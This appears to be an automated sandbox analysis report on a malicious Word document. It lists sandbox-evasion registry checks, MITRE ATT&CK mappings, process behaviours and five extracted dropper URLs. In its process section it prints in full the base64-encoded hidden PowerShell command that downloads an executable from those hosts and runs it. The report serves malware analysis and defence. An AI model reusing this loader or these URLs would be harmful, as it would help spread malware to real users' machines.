07c8176b3a48a0959727b1547ade4e09f4ccf0217be152cabc77715f119841db

General

Target

07c8176b3a48a0959727b1547ade4e09f4ccf0217be152cabc77715f119841db
Sample

191220-rrn7lday3n
SHA256

07c8176b3a48a0959727b1547ade4e09f4ccf0217be152cabc77715f119841db

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://citationvie.com/wp-includes/F4E7VRR/

exe.dropper

https://tapucreative.com/wp-admin/ds54af/

exe.dropper

http://driventodaypodcast.com/megaphone/wrm/

exe.dropper

http://datrangsuc.com/wp-admin/Szzu2WcG/

exe.dropper

http://nguyenquocltd.com/wp-content/p7dl/

Signatures

Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

Powershell.exe

pid process

3224 Powershell.exe

pid	process
3224	Powershell.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

description	ioc
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

description	ioc
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

4880 WINWORD.EXE
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

WINWORD.EXE

pid process

4880 WINWORD.EXE
Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

WINWORD.EXE

pid process

4880 WINWORD.EXE

pid	process
4880	WINWORD.EXE

pid	process
4880	WINWORD.EXE

pid	process
4880	WINWORD.EXE

Process spawned unexpected child process 1 IoCs

Processes:

Powershell.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3224	5096	Powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

Powershell.exe

description pid process

Token: SeDebugPrivilege 3224 Powershell.exe

description	pid	process
Token: SeDebugPrivilege	3224	Powershell.exe

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\07c8176b3a48a0959727b1547ade4e09f4ccf0217be152cabc77715f119841db.doc" /o ""
1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of FindShellTrayWindow
PID:4880

C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
Powershell -w hidden -en JABOAGoAdAB4AHcAYgB3AGEAdgB4AD0AJwBRAGUAZwB4AGQAZQBsAGwAcQBqACcAOwAkAFIAcQBnAG0AYwBjAHIAbwBuAHYAbwBnAHUAIAA9ACAAJwA2ADAANAAnADsAJABCAGoAagBsAHMAdwBkAHcAdwBwAHgAeQB3AD0AJwBVAHAAawBvAHEAdABhAGsAaAB4AGsAYgBqACcAOwAkAFMAeQB4AGcAaABjAHkAYQBnAGMAaAByAHUAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFIAcQBnAG0AYwBjAHIAbwBuAHYAbwBnAHUAKwAnAC4AZQB4AGUAJwA7ACQARQB1AGkAegB1AHIAbQBvAGMAYgBpAG0APQAnAEkAegBnAHYAcABxAGEAeQBhAHUAZAAnADsAJABOAG0AbwB2AGEAawBtAHIAZQBnAHIAPQAmACgAJwBuAGUAdwAtAG8AJwArACcAYgAnACsAJwBqAGUAYwB0ACcAKQAgAG4ARQB0AC4AdwBFAEIAQwBsAGkARQBOAHQAOwAkAEgAdwBvAGEAdABoAGMAYQBsAGoAPQAnAGgAdAB0AHAAcwA6AC8ALwBjAGkAdABhAHQAaQBvAG4AdgBpAGUALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAEYANABFADcAVgBSAFIALwAqAGgAdAB0AHAAcwA6AC8ALwB0AGEAcAB1AGMAcgBlAGEAdABpAHYAZQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AZABzADUANABhAGYALwAqAGgAdAB0AHAAOgAvAC8AZAByAGkAdgBlAG4AdABvAGQAYQB5AHAAbwBkAGMAYQBzAHQALgBjAG8AbQAvAG0AZQBnAGEAcABoAG8AbgBlAC8AdwByAG0ALwAqAGgAdAB0AHAAOgAvAC8AZABhAHQAcgBhAG4AZwBzAHUAYwAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AUwB6AHoAdQAyAFcAYwBHAC8AKgBoAHQAdABwADoALwAvAG4AZwB1AHkAZQBuAHEAdQBvAGMAbAB0AGQALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBwADcAZABsAC8AJwAuACIAcwBQAGAATABpAFQAIgAoACcAKgAnACkAOwAkAEMAbgBpAHUAdQBkAGMAbABkAHAAdwBvAGYAPQAnAEkAbgBoAGgAZwB1AHkAeQAnADsAZgBvAHIAZQBhAGMAaAAoACQATgBwAHgAawBqAGMAaABwAGMAIABpAG4AIAAkAEgAdwBvAGEAdABoAGMAYQBsAGoAKQB7AHQAcgB5AHsAJABOAG0AbwB2AGEAawBtAHIAZQBnAHIALgAiAEQAYABPAGAAdwBOAEwAbwBhAEQARgBgAGkAbABlACIAKAAkAE4AcAB4AGsAagBjAGgAcABjACwAIAAkAFMAeQB4AGcAaABjAHkAYQBnAGMAaAByAHUAKQA7ACQAVQBiAHQAZgB0AG4AdwB0AHIAPQAnAFUAZwBvAGkAcwBlAGYAagAnADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0ACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAFMAeQB4AGcAaABjAHkAYQBnAGMAaAByAHUAKQAuACIAbABFAGAATgBgAEcAVABIACIAIAAtAGcAZQAgADIANwA1ADYANgApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAHQAQQBgAFIAdAAiACgAJABTAHkAeABnAGgAYwB5AGEAZwBjAGgAcgB1ACkAOwAkAEkAegBxAG4AbgB2AHUAZgBlAG8APQAnAEEAYwBpAGYAawBiAGEAdgBuAHkAegAnADsAYgByAGUAYQBrADsAJABTAHkAbgBxAHQAbwB1AGEAawA9ACcAUABnAGEAYQB6AG0AZgBtAHEAcwBvAGcAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAVgBpAGoAbAB3AGsAYQBjAGcAdQB4AGcAbwA9ACcASgBuAHEAagBwAHAAZABiAHoAdgBiAHMAbgAnAA==
1⤵
- Suspicious behavior: EnumeratesProcesses
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
PID:3224

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads